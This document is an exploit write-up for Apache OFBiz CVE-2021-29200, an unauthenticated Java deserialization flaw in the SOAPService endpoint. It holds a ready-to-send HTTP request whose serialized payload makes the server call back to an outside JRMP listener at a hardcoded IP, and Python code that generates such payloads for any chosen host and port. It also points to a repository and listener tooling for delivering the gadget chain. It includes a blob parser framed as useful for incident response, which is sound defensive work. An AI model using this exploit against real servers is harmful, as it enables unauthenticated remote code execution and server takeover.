# Apache OFBiz RMI Bypass RCE(CVE-2021-29200)

File: Apache OFBiz RMI Bypass RCE(CVE-2021-29200).md (1.53 KB, 2021-05-21 09:14:38)

Apache OFBiz is affected by a Java RMI deserialization vulnerability: an unauthenticated user can achieve remote code execution and take over the server. The `/webtools/control/SOAPService` endpoint deserializes the `cus-obj` value supplied in the SOAP body. The object in the PoC below is a `javax.management.remote.rmi.RMIConnectionImpl_Stub`; its superclass `java.rmi.server.RemoteObject` has a custom `readObject` that rebuilds a `UnicastRef` from the stream, and reading that reference (`LiveRef.read`) registers the embedded endpoint (here 104.156.231.150:9999) with the DGC client, so the server opens a JRMP connection to the attacker's host and deserializes whatever comes back. That reply is where the gadget chain is delivered. The class chain used here gets past the fix for the earlier RMI deserialization issue in the same endpoint, hence "bypass".

Affected versions:
Apache OFBiz < 17.12.07

Detailed analysis: https://mp.weixin.qq.com/s/vM0pXZ5mhusFBsj1xD-2zw

PoC:
    
```
POST /webtools/control/SOAPService HTTP/1.1
Host: xxx
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: text/xml
Content-Length: 877

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
  <soapenv:Header/>
  <soapenv:Body>
    <ser>
      <map-Map>
        <map-Entry>
          <map-Key>
            <cus-obj>ACED0005737200326A617661782E6D616E6167656D656E742E72656D6F74652E726D692E524D49436F6E6E656374696F6E496D706C5F5374756200000000000000020200007872001A6A6176612E726D692E7365727665722E52656D6F746553747562E9FEDCC98BE1651A0200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707738000A556E6963617374526566000F3130342E3135362E3233312E3135300000270FFFFFFFFFEF34D1DB00000000000000000000000000000078</cus-obj>
          </map-Key>
          <map-Value>
            <std-String/>
          </map-Value>
        </map-Entry>
      </map-Map>
    </ser>
  </soapenv:Body>
</soapenv:Envelope>
```

The `cus-obj` value is a Java serialization stream in which the host string is written with `writeUTF` (length-prefixed), so point it at your own JRMP listener by regenerating the blob rather than overwriting the IP in place, and recompute `Content-Length` for the body you actually send.
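The following is an added example (Python, since the referenced poc.py is Python); it is not code from this page, from r0ckysec's repository, or from Apache OFBiz. It builds the `cus-obj` stream for an arbitrary listener host:port, wraps it in the PoC's SOAP envelope, and decodes a captured `cus-obj` back to its callback address, which is what an incident responder wants from a logged request. Class names and serialVersionUIDs are the JDK's; the `obj_num` parameter, the regex-based extractor and the blob layout assumption of a single block under 1024 bytes are this example's own choices.

```python
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_OBJECT, TC_CLASSDESC, TC_ENDBLOCKDATA, TC_NULL = 0x73, 0x72, 0x78, 0x70
TC_BLOCKDATA, TC_BLOCKDATALONG = 0x77, 0x7A
SC_SERIALIZABLE, SC_WRITE_METHOD = 0x02, 0x01
# Class chain as the JDK declares it: rmic stubs use serialVersionUID 2; RemoteObject has writeObject/readObject.
CLASS_CHAIN = [
    ("javax.management.remote.rmi.RMIConnectionImpl_Stub", 2, SC_SERIALIZABLE),
    ("java.rmi.server.RemoteStub", -1585587260594494182, SC_SERIALIZABLE),
    ("java.rmi.server.RemoteObject", -3215090123894869218, SC_SERIALIZABLE | SC_WRITE_METHOD),
]

def _utf(s):
    """DataOutput.writeUTF: 2-byte length then the bytes (ASCII assumed, so UTF-8 == modified UTF-8)."""
    b = s.encode("utf-8")
    return struct.pack(">H", len(b)) + b

def _read_utf(buf, pos):
    (n,) = struct.unpack_from(">H", buf, pos)
    return buf[pos + 2:pos + 2 + n].decode("utf-8"), pos + 2 + n

def _class_desc(name, suid, flags):
    # TC_CLASSDESC className serialVersionUID classDescFlags fieldCount(=0) TC_ENDBLOCKDATA
    return bytes([TC_CLASSDESC]) + _utf(name) + struct.pack(">qBH", suid, flags, 0) + bytes([TC_ENDBLOCKDATA])

def build_stub_payload(host, port, obj_num=0):
    """Serialize an RMIConnectionImpl_Stub whose UnicastRef points at host:port. Deserializing it runs
    RemoteObject.readObject -> UnicastRef.readExternal -> LiveRef.read, which hands the endpoint to
    DGCClient: the server dials host:port over JRMP. obj_num is the ObjID number (arbitrary)."""
    out = STREAM_MAGIC + bytes([TC_OBJECT])
    for name, suid, flags in CLASS_CHAIN:
        out += _class_desc(name, suid, flags)
    out += bytes([TC_NULL])  # no superclass below RemoteObject
    # Block data from RemoteObject.writeObject: refClassName, then LiveRef.write in the old format:
    # host UTF, port int, ObjID{objNum long, UID{unique int, time long, count short}}, isResultStream.
    ref = (_utf("UnicastRef") + _utf(host) + struct.pack(">i", port)
           + struct.pack(">qiqh", obj_num, 0, 0, 0) + b"\x00")
    if len(ref) <= 0xFF:
        out += bytes([TC_BLOCKDATA, len(ref)])
    else:  # Java switches to TC_BLOCKDATALONG above 255 bytes (one block assumed, i.e. under 1024)
        out += bytes([TC_BLOCKDATALONG]) + struct.pack(">I", len(ref))
    return out + ref + bytes([TC_ENDBLOCKDATA])

def parse_unicast_ref(stream):
    """Decode a captured cus-obj blob back to its callback endpoint (what IR wants from a logged request)."""
    if not stream.startswith(STREAM_MAGIC) or stream[4] != TC_OBJECT:
        raise ValueError("not a serialized Java object")
    pos, classes = 5, []
    while stream[pos] == TC_CLASSDESC:
        name, pos = _read_utf(stream, pos + 1)
        nfields = struct.unpack_from(">qBH", stream, pos)[2]
        pos += 11
        if nfields or stream[pos] != TC_ENDBLOCKDATA:
            raise ValueError("unexpected field layout in %s" % name)
        pos += 1
        classes.append(name)
    if stream[pos] != TC_NULL:
        raise ValueError("expected end of superclass chain")
    tag, pos = stream[pos + 1], pos + 2
    if tag == TC_BLOCKDATA:
        blen, pos = stream[pos], pos + 1
    elif tag == TC_BLOCKDATALONG:
        blen, pos = struct.unpack_from(">I", stream, pos)[0], pos + 4
    else:
        raise ValueError("expected block data from RemoteObject.writeObject")
    block = stream[pos:pos + blen]
    ref_class, p = _read_utf(block, 0)
    host, p = _read_utf(block, p)
    port, obj_num = struct.unpack_from(">iq", block, p)
    return {"classes": classes, "ref_class": ref_class, "host": host, "port": port, "obj_num": obj_num}

# The PoC's cus-obj value, pieced out so the layout is visible (constructed here from the page's values).
PAGE_BLOB_HEX = (
    "ACED0005" "73" "720032" "6A617661782E6D616E6167656D656E742E72656D6F74652E726D692E524D49436F6E6E656374696F6E496D706C5F53747562" "0000000000000002" "02" "0000" "78"
    "72001A" "6A6176612E726D692E7365727665722E52656D6F746553747562" "E9FEDCC98BE1651A" "02" "0000" "78"
    "72001C" "6A6176612E726D692E7365727665722E52656D6F74654F626A656374" "D361B4910C61331E" "03" "0000" "78"
    "70" "7738" "000A" "556E6963617374526566"  # TC_NULL, 56-byte block, "UnicastRef"
    "000F" "3130342E3135362E3233312E313530" "0000270F" "FFFFFFFFEF34D1DB"  # host, port 9999, objNum
    + "00" * 15 + "78"  # UID (14 zero bytes), isResultStream=false, TC_ENDBLOCKDATA
)
SOAP_TEMPLATE = (
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
    'xmlns:ser="http://ofbiz.apache.org/service/"><soapenv:Header/><soapenv:Body><ser><map-Map>'
    "<map-Entry><map-Key><cus-obj>{hex}</cus-obj></map-Key><map-Value><std-String/></map-Value>"
    "</map-Entry></map-Map></ser></soapenv:Body></soapenv:Envelope>"
)

def soap_envelope(payload):
    """Wrap a serialized stub in the PoC's SOAPService envelope (uppercase hex, as the PoC sends it)."""
    return SOAP_TEMPLATE.format(hex=payload.hex().upper())

def extract_cus_obj(xml_text):
    """Pull the blob out of a logged SOAP body (regex is an assumption; fine for the PoC's single element)."""
    m = re.search(r"<cus-obj>\s*([0-9A-Fa-f]+)\s*</cus-obj>", xml_text)
    return bytes.fromhex(m.group(1)) if m else None
```

`parse_unicast_ref(bytes.fromhex(PAGE_BLOB_HEX))` returns host `104.156.231.150` and port `9999`, i.e. the listener the page's PoC phones home to; `soap_envelope(build_stub_payload(host, port))` produces a fresh body for a listener of your choosing. The JRMP listener that answers the DGC call with a gadget chain (ysoserial's `JRMPListener` is the usual choice) is outside this snippet. Because the parser only trusts the class chain and block header it reads, it is also a reasonable first-pass detector for `cus-obj` values that carry a `UnicastRef` at all, whatever the outer stub class.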
    
PoC script (poc.py): https://github.com/r0ckysec/CVE-2021-29200
    
References:

* https://github.com/r0ckysec/CVE-2021-29200
* https://mp.weixin.qq.com/s/vM0pXZ5mhusFBsj1xD-2zw
* https://xz.aliyun.com/t/9556
    
    